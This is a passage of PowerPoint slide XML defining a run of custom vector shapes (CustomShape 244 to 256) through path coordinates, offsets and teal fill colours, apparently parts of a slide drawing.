                <a:lnTo>
                  <a:pt x="1" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="93" y="31"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="96" y="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6" name="CustomShape 244"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2763720" y="3630600"/>
            <a:ext cx="66240" cy="21960"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="42" h="14">
                <a:moveTo>
                  <a:pt x="42" y="6"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="40" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="42" y="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57" name="CustomShape 245"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2697120" y="3619440"/>
            <a:ext cx="43920" cy="15480"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="28" h="10">
                <a:moveTo>
                  <a:pt x="28" y="4"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28" y="4"/>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58" name="CustomShape 246"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2589120" y="3635280"/>
            <a:ext cx="256680" cy="85320"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="162" h="54">
                <a:moveTo>
                  <a:pt x="0" y="17"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="17"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="17"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="17"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="15"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="15"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21" y="12"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="31" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="40" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="43" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="162" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="161" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="159" y="29"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="158" y="31"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="157" y="33"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="155" y="34"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="152" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="150" y="39"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="147" y="41"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="144" y="43"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="141" y="46"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="137" y="48"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="135" y="49"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="131" y="52"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="128" y="53"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="126" y="54"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="17"/>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59" name="CustomShape 247"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2846520" y="3625920"/>
            <a:ext cx="90000" cy="41040"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="57" h="26">
                <a:moveTo>
                  <a:pt x="6" y="26"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="57" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="25"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="26"/>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460" name="CustomShape 248"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2606760" y="3449520"/>
            <a:ext cx="50400" cy="196560"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="32" h="124">
                <a:moveTo>
                  <a:pt x="32" y="4"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="32" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="31" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="124"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="124"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="124"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="124"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="123"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="123"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="123"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="122"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="122"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="121"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="120"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21" y="118"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24" y="117"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26" y="116"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29" y="114"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32" y="113"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32" y="4"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="7FBFBF"/>
          </a:solidFill>
          <a:ln w="9360">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:effectRef>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="461" name="CustomShape 249"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2608200" y="3452760"/>
            <a:ext cx="42480" cy="164880"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="27" h="104">
                <a:moveTo>
                  <a:pt x="27" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="27" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="104"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="104"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="104"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="104"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="104"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="102"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="102"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="101"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="101"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16" y="100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="99"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20" y="98"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23" y="97"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25" y="95"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="93"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="2"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="93CCCC"/>
          </a:solidFill>
          <a:ln w="9360">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:effectRef>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="462" name="CustomShape 250"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2611440" y="3454560"/>
            <a:ext cx="34560" cy="132840"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="22" h="84">
                <a:moveTo>
                  <a:pt x="22" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="22" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="84"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="84"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="84"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="84"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="84"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="84"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="83"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="83"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="82"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="82"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="80"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16" y="79"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="78"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="77"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="76"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="2"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="A8D8D8"/>
          </a:solidFill>
          <a:ln w="9360">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:effectRef>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="463" name="CustomShape 251"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2612880" y="3456000"/>
            <a:ext cx="26640" cy="102960"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="17" h="65">
                <a:moveTo>
                  <a:pt x="17" y="1"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="17" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="65"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="65"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="64"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="64"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="63"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="62"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="61"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17" y="58"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17" y="1"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="BCE5E5"/>
          </a:solidFill>
          <a:ln w="9360">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:effectRef>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="464" name="CustomShape 252"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2612880" y="3457440"/>
            <a:ext cx="21960" cy="72720"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="14" h="46">
                <a:moveTo>
                  <a:pt x="14" y="1"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="14" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="46"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="46"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="46"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="44"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="44"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="43"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="42"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="41"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="1"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="D1F2F2"/>
          </a:solidFill>
          <a:ln w="9360">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:effectRef>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="465" name="CustomShape 253"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2614680" y="3457440"/>
            <a:ext cx="14040" cy="42480"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="9" h="27">
                <a:moveTo>
                  <a:pt x="9" y="1"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="25"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="23"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="1"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="E5FFFF"/>
          </a:solidFill>
          <a:ln w="9360">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:effectRef>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="466" name="CustomShape 254"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2790720" y="3579840"/>
            <a:ext cx="21960" cy="21960"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="14" h="14">
                <a:moveTo>
                  <a:pt x="7" y="14"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="12"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="12"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="14"/>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67" name="CustomShape 255"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2725560" y="3579840"/>
            <a:ext cx="10800" cy="10800"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7" h="7">
                <a:moveTo>
                  <a:pt x="3" y="7"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="7"/>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68" name="CustomShape 256"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2744640" y="3579840"/>
            <a:ext cx="7560" cy="10800"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5" h="7">
                <a:moveTo>
                  <a:pt x="3" y="7"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4"/>
                </a:lnTo>
                <a:lnTo>
